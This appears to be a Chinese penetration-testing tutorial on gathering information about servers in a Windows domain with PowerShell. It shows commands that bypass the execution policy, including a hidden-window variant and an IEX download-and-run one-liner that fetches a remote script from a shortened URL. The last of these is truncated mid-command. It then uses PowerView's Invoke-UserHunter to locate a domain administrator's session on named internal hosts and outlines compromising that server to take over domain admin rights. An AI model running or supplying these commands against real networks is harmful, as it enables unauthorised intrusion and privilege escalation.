記錄線下Powershell在域環境中對於服務器的信息收集
Powershell的腳本有很多,在內網滲透測試中不僅能掃,能爆,能轉發,還能做更多的事情。我們常用的腳本有Powersploit,Empire,PowerView等等。
使用腳本之前,我們先科普下計算機上的執行策略,輸入下面命令。
get-executionpolicy
-
Restricted------默認的設置,不允許任何script運行
-
AllSigned-------只能運行經過數字證書簽名的script
-
RemoteSigned----運行本地的script不需要數字簽名,但是運行從網絡上下載的script就必須要有數字簽名
-
Unrestricted----允許所有的script運行
可以看到執行策略是默認的設置,不允許執行任何腳本,在執行之前我們需要更改下ps的執行策略,
將Restricted策略改成Unrestricted,而修改此策略必須要管理員權限,所以這里就需要采用一些方法繞過策略來執行腳本。有下面三種方法。
-
本地權限繞過執行
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
-
本地隱藏權限繞過執行腳本
PowerShell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile -WindowStyle Hidden
-
用IEX下載遠程PS1腳本回來權限繞過執行
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI');Invok
這里我們先使用powerview腳本來獲取當前域管理員在線登錄的服務器,我們將powerview腳本的Invoke-UserHunter模塊上傳主機名pavmsep131,IP為10.51.0.131的服務器中,然后使用命令Invoke-UserHunter。
具體命令如下:
powershell.exe -exec bypass -Command "&{Import-Module .\powerview.ps1;Invoke-UserHunter}"
可以看到域管理員當前在線登陸的機器為主機名PAVMSXD30,ip為10.51.0.30的服務器,此時我們需要入侵此服務器然后遷移到域管理登陸所在的進程,便擁有了域管理的權限。